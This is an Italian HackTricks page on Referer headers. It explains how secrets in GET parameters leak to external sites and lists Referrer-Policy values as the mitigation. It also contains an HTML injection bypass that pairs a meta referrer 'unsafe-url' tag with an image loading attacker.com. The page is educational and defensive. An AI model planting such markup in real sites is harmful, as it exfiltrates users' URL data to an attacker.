3.6 KiB
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi i tuoi trucchi di hacking inviando PR ai repository HackTricks e HackTricks Cloud su GitHub.
Intestazioni di riferimento e politica
Il riferimento è l'intestazione utilizzata dai browser per indicare quale è stata la pagina precedente visitata.
Informazioni sensibili divulgate
Se in una pagina web viene trovata in qualche punto qualsiasi informazione sensibile nei parametri di una richiesta GET, se la pagina contiene collegamenti a fonti esterne o un attaccante è in grado di far visitare all'utente un URL controllato dall'attaccante (ad esempio tramite social engineering), potrebbe essere in grado di esfiltrare le informazioni sensibili all'interno dell'ultima richiesta GET.
Mitigazione
È possibile fare in modo che il browser segua una politica di riferimento che potrebbe evitare che le informazioni sensibili vengano inviate ad altre applicazioni web:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Contromisure
È possibile annullare questa regola utilizzando un tag meta HTML (l'attaccante deve sfruttare un'iniezione HTML):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Difesa
Non inserire mai dati sensibili nei parametri GET o nei percorsi dell'URL.
Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF controlla i PIANI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi i tuoi trucchi di hacking inviando PR ai repository github di HackTricks e HackTricks Cloud.